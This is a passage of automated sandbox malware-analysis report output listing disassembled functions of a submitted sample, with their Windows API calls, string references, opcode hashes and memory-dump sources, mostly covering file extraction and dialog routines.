                                                              • Opcode ID: 213f8d9ff39be79cf0b355aff9430b0d2ed54e2c38636a9f8bb09b5a5bb71606
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: 213f8d9ff39be79cf0b355aff9430b0d2ed54e2c38636a9f8bb09b5a5bb71606
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              Function 00CBE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5d0008ad0ff9f0fd4a5faf5e4276b089044dcf1244e015eb9becf0c49004fc4b
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: 5d0008ad0ff9f0fd4a5faf5e4276b089044dcf1244e015eb9becf0c49004fc4b
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              Function 00CBE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 375791acbd901921229ed4cc697bb686610555f912907224aaa4f1ec10d7218f
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: 375791acbd901921229ed4cc697bb686610555f912907224aaa4f1ec10d7218f
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              Function 00CBE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 383d09aea8e812e7d1d1031ad2acda3627c395fc0e6660175805973f032ec815
                                                              • Instruction ID: d91921d0ca807f8cf1c898191eee321ea1b230d7ffae67da977a4180c77f9060
                                                              • Opcode Fuzzy Hash: 383d09aea8e812e7d1d1031ad2acda3627c395fc0e6660175805973f032ec815
                                                              • Instruction Fuzzy Hash: 1AA022C22AC003BC3008A2A32C83CFB022EC8C0F28B30883FF802C00C0BC800C0AA830
                                                              Function 00CBE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5425d6755c3d07953e31d84f111debf3f83f5ba115b4f706f404907cf3ab7b18
                                                              • Instruction ID: d91921d0ca807f8cf1c898191eee321ea1b230d7ffae67da977a4180c77f9060
                                                              • Opcode Fuzzy Hash: 5425d6755c3d07953e31d84f111debf3f83f5ba115b4f706f404907cf3ab7b18
                                                              • Instruction Fuzzy Hash: 1AA022C22AC003BC3008A2A32C83CFB022EC8C0F28B30883FF802C00C0BC800C0AA830
                                                              Function 00CBE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 80da5aa758877faf645124b4c4c8c26570970392462f9e8a8b3c0d4af9edcae2
                                                              • Instruction ID: 9c2f1a747d95d5db2e4fb68c41e2aa7d8521b2fe92bb910dff2b6a39fcd51536
                                                              • Opcode Fuzzy Hash: 80da5aa758877faf645124b4c4c8c26570970392462f9e8a8b3c0d4af9edcae2
                                                              • Instruction Fuzzy Hash: 16A011C22E8802BC3008220A2C02CFB020EC0C2F28B308A2EFA02800C0A8800C0AA832
                                                              Function 00CBE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0ea5218368610a893f85a77246e99de84cb9f58841312bf12c9089bd23bee1a0
                                                              • Instruction ID: 9c2f1a747d95d5db2e4fb68c41e2aa7d8521b2fe92bb910dff2b6a39fcd51536
                                                              • Opcode Fuzzy Hash: 0ea5218368610a893f85a77246e99de84cb9f58841312bf12c9089bd23bee1a0
                                                              • Instruction Fuzzy Hash: 16A011C22E8802BC3008220A2C02CFB020EC0C2F28B308A2EFA02800C0A8800C0AA832
                                                              Function 00CBE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 1927e44403426dd47d8da2a9ad005236d3022cbc013fd68b0b357ac8fd759f3f
                                                              • Instruction ID: 9c2f1a747d95d5db2e4fb68c41e2aa7d8521b2fe92bb910dff2b6a39fcd51536
                                                              • Opcode Fuzzy Hash: 1927e44403426dd47d8da2a9ad005236d3022cbc013fd68b0b357ac8fd759f3f
                                                              • Instruction Fuzzy Hash: 16A011C22E8802BC3008220A2C02CFB020EC0C2F28B308A2EFA02800C0A8800C0AA832
                                                              Function 00CBE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3b9c5d61b8d515353725ac1827333834c26783c6152d7223111bd4ab58575cf7
                                                              • Instruction ID: 79400f077364a50ef3269ff85aa8dd20b0a00a644bb75bb539f8efdefedc21c5
                                                              • Opcode Fuzzy Hash: 3b9c5d61b8d515353725ac1827333834c26783c6152d7223111bd4ab58575cf7
                                                              • Instruction Fuzzy Hash: 8AA022C22E80023C3008A2B32C83CFB022EC8E0F2AB30823FF800C00C0BC800C0AA830
                                                              Function 00CBAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,00CBAE72,C:\Users\user\Desktop,00000000,00CE946A,00000006), ref: 00CBAC08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 19ed4050d8e8f5be59584b4c0446e8ae198553c793176a51599a52861a7d7142
                                                              • Instruction ID: 725f5fef40c77bdb342b9435135ca5cea3a2eecd6613c447e5b744bbd5a59583
                                                              • Opcode Fuzzy Hash: 19ed4050d8e8f5be59584b4c0446e8ae198553c793176a51599a52861a7d7142
                                                              • Instruction Fuzzy Hash: 4EA001712062829B96015B329F4AB4EBBAAAFA2B51F05C42AA54588170DB35C960AA16
                                                              Function 00CA9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00CA95D6,?,?,?,?,?,00CD2641,000000FF), ref: 00CA963B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 3717c3fb60f43547584ca069b8da434ec63245da59560cb402971ccf1eba4361
                                                              • Instruction ID: d4c90e78c9c44ed068a9d3052c694641cdd370292ad025d28c969608e0bb6e36
                                                              • Opcode Fuzzy Hash: 3717c3fb60f43547584ca069b8da434ec63245da59560cb402971ccf1eba4361
                                                              • Instruction Fuzzy Hash: E3F0E270082B469FDB308A20C549B92B7E8EF13329F081B1EE0F3429E0D3706ACD9A40

                                                              Non-executed Functions

                                                              Function 00CBC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CBC2B1
                                                              • EndDialog.USER32(?,00000006), ref: 00CBC2C4
                                                              • GetDlgItem.USER32(?,0000006C), ref: 00CBC2E0
                                                              • SetFocus.USER32(00000000), ref: 00CBC2E7
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CBC321
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CBC358
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00CBC36E
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CBC38C
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBC39C
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBC3B8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBC3D4
                                                              • _swprintf.LIBCMT ref: 00CBC404
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CBC417
                                                              • FindClose.KERNEL32(00000000), ref: 00CBC41E
                                                              • _swprintf.LIBCMT ref: 00CBC477
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CBC48A
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CBC4A7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CBC4C7
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBC4D7
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBC4F1
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBC509
                                                              • _swprintf.LIBCMT ref: 00CBC535
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CBC548
                                                              • _swprintf.LIBCMT ref: 00CBC59C
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CBC5AF
                                                                • Part of subcall function 00CBAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CBAF35
                                                                • Part of subcall function 00CBAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CDE72C,?,?), ref: 00CBAF84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                              • API String ID: 797121971-1840816070
                                                              • Opcode ID: f31b3cbdc12afdf2f0d8e24161f2f6147be993d08e61b92ebe2fd0ba4b6aa556
                                                              • Instruction ID: 2039ee8dcdee20ba97ed0d6f6813b86e66fe937e1b33bf2c6d83e2d5a1d25bec
                                                              • Opcode Fuzzy Hash: f31b3cbdc12afdf2f0d8e24161f2f6147be993d08e61b92ebe2fd0ba4b6aa556
                                                              • Instruction Fuzzy Hash: 4E917172648349BBE2219BA0CC89FFF77ACEB4A704F044819B749D6181D775AA049B73
                                                              Function 00CA6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA6FAA
                                                              • _wcslen.LIBCMT ref: 00CA7013
                                                              • _wcslen.LIBCMT ref: 00CA7084
                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                                • Part of subcall function 00CAA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641,000000FF), ref: 00CAA1F1
                                                                • Part of subcall function 00CAA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641), ref: 00CAA21F
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CA7139
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CA7155
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CA7298
                                                                • Part of subcall function 00CA9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CA73BC,?,?,?,00000000), ref: 00CA9DBC
                                                                • Part of subcall function 00CA9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9E70
                                                                • Part of subcall function 00CA9620: CloseHandle.KERNELBASE(000000FF,?,?,00CA95D6,?,?,?,?,?,00CD2641,000000FF), ref: 00CA963B
                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3983180755-3508440684
                                                              • Opcode ID: 54c17d03f59becc9dcb8a61d1c9c4aa96c5034dddd0be4cd66840f7c2f9da862
                                                              • Instruction ID: 08d419305b4f6166b7f805857684c725c2ca18e62bfc1db830bcec15feaf8c4f
                                                              • Opcode Fuzzy Hash: 54c17d03f59becc9dcb8a61d1c9c4aa96c5034dddd0be4cd66840f7c2f9da862
                                                              • Instruction Fuzzy Hash: 87C1F671D04646AEDB21DB74CD81FEEB3A8BF05308F04465AFA56E3282D734AB44DB61
                                                              Function 00CCD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
